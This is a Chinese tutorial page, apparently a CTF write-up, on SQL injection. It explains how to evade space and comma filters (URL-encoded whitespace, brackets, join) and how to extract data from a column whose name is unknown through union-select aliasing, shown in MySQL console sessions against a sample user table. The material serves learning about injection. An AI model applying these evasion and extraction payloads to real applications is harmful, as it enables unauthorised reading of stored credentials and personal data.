Mysql如何巧妙的绕过未知字段名详解_mysql数据库教程-查字典教程网

Mysql如何巧妙的绕过未知字段名详解

摘要：实现思路题目过滤空格和逗号，空格使用%0a，%0b，%0c，%0d，%a0，或者直接使用括号都可以绕过，逗号使用join绕过;Mysql如何...

实现思路

题目过滤空格和逗号，空格使用%0a，%0b，%0c，%0d，%a0，或者直接使用括号都可以绕过，逗号使用join绕过; Mysql如何巧妙的绕过未知字段名详解

存放flag的字段名未知，information_schema.columns也将表名的hex过滤了，即获取不到字段名;这时可以利用联合查询，过程如下：

思想就是获取flag，让其在已知字段名下出现;

示例代码：

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;

+---+---+---+---+

| a | b | c | d |

+---+---+---+---+

| 1 | 2 | 3 | 4 |

+---+---+---+---+

1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;

+---+---+---+---+

| 1 | 2 | 3 | 4 |

+---+---+---+---+

| 1 | 2 | 3 | 4 |

+---+---+---+---+

1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;

+---+-------+----------+-------------+

| 1 | 2 | 3 | 4 |

+---+-------+----------+-------------+

| 1 | 2 | 3 | 4 |

| 1 | admin | admin888 | 110@110.com |

| 2 | test | test123 | 119@119.com |

| 3 | cs | cs123 | 120@120.com |

+---+-------+----------+-------------+

4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;

+-------------+

| 4 |

+-------------+

| 4 |

| 110@110.com |

| 119@119.com |

| 120@120.com |

+-------------+

4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;

+-------------+

| 4 |

+-------------+

| 120@120.com |

+-------------+

1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d

union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;

+-------------+----------+----------+-------------+

+-------------+----------+----------+-------------+

| 1 | admin | admin888 | 110@110.com |

| 120@120.com | 1 | 1 | 1 |

+-------------+----------+----------+-------------+

2 rows in set (0.04 sec)

【Mysql如何巧妙的绕过未知字段名详解】相关文章：

★ sql alert 添加、修改、删除字段语法实例

★ MySQL安全配置详解

★ Mysql存储引擎InnoDB和Myisam的六大区别

★ mysql的左右内连接用法实例

★ mysql 获取当天发布的信息的语句

★ mysql数据库优化必会的几个参数中文解释

★ mysql 主从服务器的简单配置

★ mysql删除表中某一字段重复的记录

★ mysql多表随机查询优化方案

★ mysql下float类型使用一些误差详解

上一篇： SQL计算timestamp的差值的方法

下一篇： Win2008 R2 mysql 5.5 zip格式mysql 安装与配置

学习工具